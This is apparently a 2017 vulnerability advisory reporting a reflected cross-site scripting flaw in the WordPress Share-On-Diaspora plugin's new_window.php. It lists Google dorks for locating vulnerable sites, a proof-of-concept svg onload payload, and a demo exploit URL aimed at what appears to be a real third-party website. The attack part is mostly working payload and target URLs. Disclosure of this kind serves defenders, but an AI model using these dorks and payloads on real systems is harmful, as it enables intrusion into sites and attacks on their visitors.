The WordPress Share-On-Diaspora plugin suffers from a cross site scripting vulnerability.
1c0a600c9f6a0a47943a2a57744fe943
[+] Title: WordPress share-on-diaspora Plugin Cross Site Scripting (XSS)
[+] Date: 2017/08/17
[+] Author: APA Golestan - GuCert
[+] Vendor Homepage: www.WordPress.org
[+] Tested on: Windows 10 & Kali Linux
[+] Vulnerable File: /new_window.php
[+] Dorks : inurl:/wp-content/plugins/share-on-diaspora/new_window.php?url=
intext:"by Share on Diaspora plugin for WordPress."
### POC:
[+] Xss Alert Code: a><svg onload=alert(/xss/)>
[+] http://site/wp-content/plugins/share-on-diaspora/new_window.php?url=a><svg
onload=alert(/xss/)>
### Demo:
[+] Photo: http://gucert.ir/files/2017/08/apa-1.jpg
[+]
http://openlifechallenge.cc/wp-content/plugins/share-on-diaspora/new_window.php?url=%E2%80%9D%3E%3Csvg%20onload=alert(/xss/)%3E
### Credits:
[+] Gucert.ir